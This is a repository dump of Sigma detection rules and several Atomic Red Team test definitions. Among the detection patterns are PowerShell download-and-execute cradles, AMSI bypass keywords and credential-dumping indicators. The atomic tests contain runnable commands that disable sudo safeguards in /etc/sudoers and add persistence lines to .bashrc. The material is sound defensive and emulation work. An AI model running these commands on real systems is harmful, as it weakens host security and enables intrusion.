'.hastebin.com/raw/' 20 | condition: selection 21 | fields: 22 | - ClientIP 23 | - c-uri 24 | - c-useragent 25 | falsepositives: 26 | - User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste) 27 | level: high 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_susp_download_run_key.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious RUN Key from Download 2 | id: 9c5037d1-c568-49b3-88c7-9846a5bdc2be 3 | status: experimental 4 | description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories 5 | references: 6 | - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ 7 | author: Florian Roth 8 | date: 2019/10/01 9 | tags: 10 | - attack.persistence 11 | - attack.t1060 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | EventID: 13 18 | Image: 19 | - '*\Downloads\\*' 20 | - '*\Temporary Internet Files\Content.Outlook\\*' 21 | - '*\Local Settings\Temporary Internet Files\\*' 22 | TargetObject: '*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\*' 23 | condition: selection 24 | falsepositives: 25 | - Software installers downloaded and used by users 26 | level: high -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_suspicious_invocation_specific.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious PowerShell Invocations - Specific 2 | id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c 3 | status: experimental 4 | description: Detects suspicious PowerShell invocation command parameters 5 | tags: 6 | - attack.execution 7 | - attack.t1086 8 | author: Florian Roth (rule) 9 | logsource: 10 | product: windows 11 | service: powershell 12 | detection: 13 | keywords: 14 | Message: 15 | - '* -nop -w hidden -c * [Convert]::FromBase64String*' 16 | - '* -w hidden -noni -nop -c "iex(New-Object*' 17 | - '* -w hidden -ep bypass -Enc*' 18 | - '*powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run*' 19 | - '*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*' 20 | - '*iex(New-Object Net.WebClient).Download*' 21 | condition: keywords 22 | falsepositives: 23 | - Penetration tests 24 | level: high 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_win_binary_susp_com.yml: -------------------------------------------------------------------------------- 1 | title: Microsoft Binary Suspicious Communication Endpoint 2 | id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97 3 | status: experimental 4 | description: Detects an executable in the Windows folder accessing suspicious domains 5 | references: 6 | - https://twitter.com/M_haggis/status/900741347035889665 7 | - https://twitter.com/M_haggis/status/1032799638213066752 8 | author: Florian Roth 9 | date: 2018/08/30 10 | tags: 11 | - attack.lateral_movement 12 | - attack.t1105 13 | logsource: 14 | product: windows 15 | service: sysmon 16 | detection: 17 | selection: 18 | EventID: 3 19 | Initiated: 'true' 20 | DestinationHostname: 21 | - '*dl.dropboxusercontent.com' 22 | - '*.pastebin.com' 23 | - '*.githubusercontent.com' # includes both gists and github repositories 24 | Image: 'C:\Windows\\*' 25 | condition: selection 26 | falsepositives: 27 | - 'Unknown' 28 | level: high 29 | 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_exploit_cve_2017_11882.yml: -------------------------------------------------------------------------------- 1 | title: Droppers exploiting CVE-2017-11882 2 | id: 678eb5f4-8597-4be6-8be7-905e4234b53a 3 | status: experimental 4 | description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe 5 | references: 6 | - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100 7 | - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw 8 | author: Florian Roth 9 | date: 2017/11/23 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1211 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | ParentImage: '*\EQNEDT32.EXE' 19 | condition: selection 20 | fields: 21 | - CommandLine 22 | falsepositives: 23 | - unknown 24 | level: critical 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_msoffice.yml: -------------------------------------------------------------------------------- 1 | title: Malicious payload download via Office binaries 2 | id: 0c79148b-118e-472b-bdb7-9b57b444cc19 3 | status: experimental 4 | description: Downloads payload from remote server 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml 7 | - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 8 | - Reegun J (OCBC Bank) 9 | author: Beyu Denis, oscd.community 10 | date: 2019/10/26 11 | modified: 2019/11/04 12 | tags: 13 | - attack.command_and_control 14 | - attack.t1105 15 | level: high 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: 22 | - '\powerpnt.exe' 23 | - '\winword.exe' 24 | - '\excel.exe' 25 | CommandLine|contains: 'http' 26 | condition: selection 27 | falsepositives: 28 | - Unknown 29 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1160.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1160 3 | display_name: Launch Daemon 4 | 5 | atomic_tests: 6 | - name: Launch Daemon 7 | description: | 8 | Utilize LaunchDaemon to launch `Hello World` 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | 14 | executor: 15 | name: manual 16 | steps: | 17 | 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons 18 | 2. 19 | 20 | 21 | 22 | 23 | Label 24 | com.example.hello 25 | ProgramArguments 26 | 27 | hello 28 | world 29 | 30 | KeepAlive 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_whoami.yml: -------------------------------------------------------------------------------- 1 | title: Whoami Execution 2 | id: e28a5a99-da44-436d-b7a0-2afc20a5f413 3 | status: experimental 4 | description: Detects the execution of whoami, which is often used by attackers after exloitation / privilege escalation but rarely used by administrators 5 | references: 6 | - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ 7 | - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ 8 | author: Florian Roth 9 | date: 2018/08/13 10 | tags: 11 | - attack.discovery 12 | - attack.t1033 13 | - car.2016-03-001 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection: 19 | Image: '*\whoami.exe' 20 | selection2: 21 | OriginalFileName: 'whoami.exe' 22 | condition: selection or selection2 23 | falsepositives: 24 | - Admin activity 25 | - Scripts and administrative tools used in the monitored environment 26 | level: high 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_powershell_amsi_bypass.yml: -------------------------------------------------------------------------------- 1 | title: Powershell AMSI Bypass via .NET Reflection 2 | id: 30edb182-aa75-42c0-b0a9-e998bb29067c 3 | status: experimental 4 | description: Detects Request to amsiInitFailed that can be used to disable AMSI Scanning 5 | references: 6 | - https://twitter.com/mattifestation/status/735261176745988096 7 | - https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120 8 | tags: 9 | - attack.execution 10 | - attack.defense_evasion 11 | - attack.t1086 12 | author: Markus Neis 13 | date: 2018/08/17 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection1: 19 | CommandLine: 20 | - '*System.Management.Automation.AmsiUtils*' 21 | selection2: 22 | CommandLine: 23 | - '*amsiInitFailed*' 24 | condition: selection1 and selection2 25 | falsepositives: 26 | - Potential Admin Activity 27 | level: high 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_service_execution.yml: -------------------------------------------------------------------------------- 1 | title: Service Execution 2 | id: 2a072a96-a086-49fa-bcb5-15cc5a619093 3 | status: experimental 4 | description: Detects manual service execution (start) via system utilities 5 | author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community 6 | date: 2019/10/21 7 | modified: 2019/11/04 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1035/T1035.yaml 10 | logsource: 11 | category: process_creation 12 | product: windows 13 | detection: 14 | selection: 15 | Image|endswith: 16 | - '\net.exe' 17 | - '\net1.exe' 18 | CommandLine|contains: ' start ' # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression 19 | condition: selection 20 | falsepositives: 21 | - Legitimate administrator or user executes a service for legitimate reason 22 | level: low 23 | tags: 24 | - attack.execution 25 | - attack.t1035 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_webshell_spawn.yml: -------------------------------------------------------------------------------- 1 | title: Shells Spawned by Web Servers 2 | id: 8202070f-edeb-4d31-a010-a26c72ac5600 3 | status: experimental 4 | description: Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack 5 | author: Thomas Patzke 6 | logsource: 7 | category: process_creation 8 | product: windows 9 | detection: 10 | selection: 11 | ParentImage: 12 | - '*\w3wp.exe' 13 | - '*\httpd.exe' 14 | - '*\nginx.exe' 15 | - '*\php-cgi.exe' 16 | Image: 17 | - '*\cmd.exe' 18 | - '*\sh.exe' 19 | - '*\bash.exe' 20 | - '*\powershell.exe' 21 | condition: selection 22 | fields: 23 | - CommandLine 24 | - ParentCommandLine 25 | tags: 26 | - attack.privilege_escalation 27 | - attack.persistence 28 | - attack.t1100 29 | falsepositives: 30 | - Particular web applications may spawn a shell process legitimately 31 | level: high 32 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/lnx_sudo_cve_2019_14287.yml: -------------------------------------------------------------------------------- 1 | action: global 2 | title: Sudo Privilege Escalation CVE-2019-14287 3 | id: f74107df-b6c6-4e80-bf00-4170b658162b 4 | status: experimental 5 | description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 6 | references: 7 | - https://www.openwall.com/lists/oss-security/2019/10/14/1 8 | - https://access.redhat.com/security/cve/cve-2019-14287 9 | - https://twitter.com/matthieugarin/status/1183970598210412546 10 | author: Florian Roth 11 | date: 2019/10/15 12 | modified: 2019/10/20 13 | tags: 14 | - attack.privilege_escalation 15 | - attack.t1068 16 | - attack.t1169 17 | logsource: 18 | product: linux 19 | falsepositives: 20 | - Unlikely 21 | level: critical 22 | --- 23 | detection: 24 | selection_keywords: 25 | - '* -u#*' 26 | condition: selection_keywords 27 | --- 28 | detection: 29 | selection_user: 30 | USER: 31 | - '#-*' 32 | - '#*4294967295' 33 | condition: selection_user -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_cobaltstrike_process_injection.yml: -------------------------------------------------------------------------------- 1 | title: CobaltStrike Process Injection 2 | id: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42 3 | description: Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons 4 | references: 5 | - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f 6 | - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/ 7 | tags: 8 | - attack.defense_evasion 9 | - attack.t1055 10 | status: experimental 11 | author: Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community 12 | date: 2018/11/30 13 | modified: 2019/11/08 14 | logsource: 15 | product: windows 16 | service: sysmon 17 | detection: 18 | selection: 19 | EventID: 8 20 | TargetProcessAddress|endswith: 21 | - '0B80' 22 | - '0C7C' 23 | - '0C88' 24 | condition: selection 25 | falsepositives: 26 | - unknown 27 | level: high 28 | 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_csc_folder.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Csc.exe Source File Folder 2 | id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 3 | description: Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData) 4 | status: experimental 5 | references: 6 | - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/ 7 | - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf 8 | - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/ 9 | author: Florian Roth 10 | date: 2019/08/24 11 | modified: 2019/08/31 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1500 15 | logsource: 16 | category: process_creation 17 | product: windows 18 | detection: 19 | selection: 20 | Image: '*\csc.exe' 21 | CommandLine: 22 | - '*\AppData\\*' 23 | - '*\Windows\Temp\\*' 24 | condition: selection 25 | falsepositives: 26 | - Unkown 27 | level: high 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_cactustorch.yml: -------------------------------------------------------------------------------- 1 | title: CACTUSTORCH Remote Thread Creation 2 | id: 2e4e488a-6164-4811-9ea1-f960c7359c40 3 | description: Detects remote thread creation from CACTUSTORCH as described in references. 4 | references: 5 | - https://twitter.com/SBousseaden/status/1090588499517079552 6 | - https://github.com/mdsecactivebreach/CACTUSTORCH 7 | status: experimental 8 | author: '@SBousseaden (detection), Thomas Patzke (rule)' 9 | logsource: 10 | product: windows 11 | service: sysmon 12 | detection: 13 | selection: 14 | EventID: 8 15 | SourceImage: 16 | - '*\System32\cscript.exe' 17 | - '*\System32\wscript.exe' 18 | - '*\System32\mshta.exe' 19 | - '*\winword.exe' 20 | - '*\excel.exe' 21 | TargetImage: '*\SysWOW64\\*' 22 | StartModule: null 23 | condition: selection 24 | tags: 25 | - attack.execution 26 | - attack.t1055 27 | - attack.t1064 28 | falsepositives: 29 | - unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_mal_creddumper.yml: -------------------------------------------------------------------------------- 1 | action: global 2 | title: Malicious Service Install 3 | id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed 4 | description: This method detects well-known keywords of malicious services in the Windows System Eventlog 5 | author: Florian Roth 6 | tags: 7 | - attack.credential_access 8 | - attack.t1003 9 | - attack.s0005 10 | logsource: 11 | product: windows 12 | service: system 13 | detection: 14 | selection1: 15 | EventID: 16 | - 7045 17 | keywords: 18 | Message: 19 | - '*WCE SERVICE*' 20 | - '*WCESERVICE*' 21 | - '*DumpSvc*' 22 | quarkspwdump: 23 | EventID: 16 24 | HiveName: '*\AppData\Local\Temp\SAM*.dmp' 25 | condition: ( selection1 and keywords ) or ( selection2 and keywords ) or quarkspwdump 26 | falsepositives: 27 | - Unlikely 28 | level: high 29 | --- 30 | logsource: 31 | product: windows 32 | service: security 33 | detection: 34 | selection2: 35 | EventID: 4697 36 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_execution_path_webserver.yml: -------------------------------------------------------------------------------- 1 | title: Execution in Webserver Root Folder 2 | id: 35efb964-e6a5-47ad-bbcd-19661854018d 3 | status: experimental 4 | description: Detects a suspicious program execution in a web service root folder (filter out false positives) 5 | author: Florian Roth 6 | tags: 7 | - attack.persistence 8 | - attack.t1100 9 | logsource: 10 | category: process_creation 11 | product: windows 12 | detection: 13 | selection: 14 | Image: 15 | - '*\wwwroot\\*' 16 | - '*\wmpub\\*' 17 | - '*\htdocs\\*' 18 | filter: 19 | Image: 20 | - '*bin\\*' 21 | - '*\Tools\\*' 22 | - '*\SMSComponent\\*' 23 | ParentImage: 24 | - '*\services.exe' 25 | condition: selection and not filter 26 | fields: 27 | - CommandLine 28 | - ParentCommandLine 29 | falsepositives: 30 | - Various applications 31 | - Tools that include ping or nslookup command invocations 32 | level: medium 33 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_slingshot.yml: -------------------------------------------------------------------------------- 1 | action: global 2 | title: Defrag Deactivation 3 | id: 958d81aa-8566-4cea-a565-59ccd4df27b0 4 | author: Florian Roth 5 | description: Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group 6 | references: 7 | - https://securelist.com/apt-slingshot/84312/ 8 | tags: 9 | - attack.persistence 10 | - attack.t1053 11 | - attack.s0111 12 | detection: 13 | condition: 1 of them 14 | falsepositives: 15 | - Unknown 16 | level: medium 17 | --- 18 | logsource: 19 | category: process_creation 20 | product: windows 21 | detection: 22 | selection1: 23 | CommandLine: 24 | - '*schtasks* /delete *Defrag\ScheduledDefrag*' 25 | --- 26 | logsource: 27 | product: windows 28 | service: security 29 | definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success' 30 | detection: 31 | selection2: 32 | EventID: 4701 33 | TaskName: '\Microsoft\Windows\Defrag\ScheduledDefrag' 34 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1206.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1206 3 | display_name: Sudo Caching 4 | 5 | atomic_tests: 6 | - name: Unlimited sudo cache timeout 7 | description: | 8 | Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. 9 | 10 | supported_platforms: 11 | - macos 12 | - linux 13 | 14 | executor: 15 | name: sh 16 | command: | 17 | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers 18 | sudo visudo -c -f /etc/sudoers 19 | 20 | - name: Disable tty_tickets for sudo caching 21 | description: | 22 | Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. 23 | 24 | supported_platforms: 25 | - macos 26 | - linux 27 | 28 | executor: 29 | name: sh 30 | command: | 31 | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" 32 | sudo visudo -c -f /etc/sudoers 33 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_sofacy.yml: -------------------------------------------------------------------------------- 1 | title: Sofacy Trojan Loader Activity 2 | id: ba778144-5e3d-40cf-8af9-e28fb1df1e20 3 | author: Florian Roth 4 | status: experimental 5 | description: Detects Trojan loader acitivty as used by APT28 6 | references: 7 | - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/ 8 | - https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100 9 | - https://twitter.com/ClearskySec/status/960924755355369472 10 | tags: 11 | - attack.g0007 12 | - attack.execution 13 | - attack.t1059 14 | - attack.defense_evasion 15 | - attack.t1085 16 | - car.2013-10-002 17 | logsource: 18 | category: process_creation 19 | product: windows 20 | detection: 21 | selection: 22 | CommandLine: 23 | - 'rundll32.exe %APPDATA%\\*.dat",*' 24 | - 'rundll32.exe %APPDATA%\\*.dll",#1' 25 | condition: selection 26 | falsepositives: 27 | - Unknown 28 | level: critical 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_data_compressed.yml: -------------------------------------------------------------------------------- 1 | title: Data Compressed 2 | id: 6dc5d284-69ea-42cf-9311-fb1c3932a69a 3 | status: experimental 4 | description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount 5 | of data sent over the network 6 | author: Timur Zinniatullin, oscd.community 7 | date: 2019/10/21 8 | modified: 2019/11/04 9 | references: 10 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml 11 | logsource: 12 | product: windows 13 | service: powershell 14 | description: 'Script block logging must be enabled' 15 | detection: 16 | selection: 17 | EventID: 4104 18 | keywords|contains|all: 19 | - '-Recurse' 20 | - '|' 21 | - 'Compress-Archive' 22 | condition: selection 23 | falsepositives: 24 | - highly likely if archive ops are done via PS 25 | level: low 26 | tags: 27 | - attack.exfiltration 28 | - attack.t1002 29 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1156.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1156 3 | display_name: .bash_profile and .bashrc 4 | 5 | atomic_tests: 6 | - name: Add command to .bash_profile 7 | description: | 8 | Adds a command to the .bash_profile file of the current user 9 | supported_platforms: 10 | - macos 11 | - linux 12 | input_arguments: 13 | command_to_add: 14 | description: Command to add to the .bash_profile file 15 | type: string 16 | default: /path/to/script.py 17 | executor: 18 | name: sh 19 | command: | 20 | echo "#{command_to_add}" >> ~/.bash_profile 21 | 22 | - name: Add command to .bashrc 23 | description: | 24 | Adds a command to the .bashrc file of the current user 25 | supported_platforms: 26 | - macos 27 | - linux 28 | input_arguments: 29 | command_to_add: 30 | description: Command to add to the .bashrc file 31 | type: string 32 | default: /path/to/script.py 33 | executor: 34 | name: sh 35 | command: | 36 | echo "#{command_to_add}" >> ~/.bashrc 37 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_alert_lsass_access.yml: -------------------------------------------------------------------------------- 1 | title: LSASS Access Detected via Attack Surface Reduction 2 | id: a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98 3 | description: Detects Access to LSASS Process 4 | status: experimental 5 | references: 6 | - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter 7 | author: Markus Neis 8 | date: 2018/08/26 9 | tags: 10 | - attack.credential_access 11 | - attack.t1003 12 | # Defender Attack Surface Reduction 13 | logsource: 14 | product: windows_defender 15 | definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)' 16 | detection: 17 | selection: 18 | EventID: 1121 19 | Path: '*\lsass.exe' 20 | condition: selection 21 | falsepositives: 22 | - Google Chrome GoogleUpdate.exe 23 | - Some Taskmgr.exe related activity 24 | level: high 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_rdp_reverse_tunnel.yml: -------------------------------------------------------------------------------- 1 | title: RDP over Reverse SSH Tunnel WFP 2 | id: 5bed80b6-b3e8-428e-a3ae-d3c757589e41 3 | status: experimental 4 | description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 5 | references: 6 | - https://twitter.com/SBousseaden/status/1096148422984384514 7 | author: Samir Bousseaden 8 | date: 2019/02/16 9 | tags: 10 | - attack.defense_evasion 11 | - attack.command_and_control 12 | - attack.t1076 13 | - car.2013-07-002 14 | logsource: 15 | product: windows 16 | service: security 17 | detection: 18 | selection: 19 | EventID: 5156 20 | sourceRDP: 21 | SourcePort: 3389 22 | DestinationAddress: 23 | - '127.*' 24 | - '::1' 25 | destinationRDP: 26 | DestinationPort: 3389 27 | SourceAddress: 28 | - '127.*' 29 | - '::1' 30 | condition: selection and ( sourceRDP or destinationRDP ) 31 | falsepositives: 32 | - unknown 33 | level: high 34 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_comsvcs_procdump.yml: -------------------------------------------------------------------------------- 1 | title: Process dump via comsvcs DLL 2 | id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c 3 | status: experimental 4 | description: Detects process memory dump via comsvcs.dll and rundll32 5 | references: 6 | - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ 7 | - https://twitter.com/SBousseaden/status/1167417096374050817 8 | author: Modexp (idea) 9 | date: 2019/09/02 10 | logsource: 11 | category: process_creation 12 | product: windows 13 | detection: 14 | rundll_image: 15 | Image: '*\rundll32.exe' 16 | rundll_ofn: 17 | OriginalFileName: 'RUNDLL32.EXE' 18 | selection: 19 | CommandLine: 20 | - '*comsvcs*MiniDump*full*' 21 | - '*comsvcs*MiniDumpW*full*' 22 | condition: (rundll_image or rundll_ofn) and selection 23 | fields: 24 | - CommandLine 25 | - ParentCommandLine 26 | tags: 27 | - attack.credential_access 28 | - attack.t1003 29 | falsepositives: 30 | - unknown 31 | level: medium 32 | --------------------------------------------------------------------------------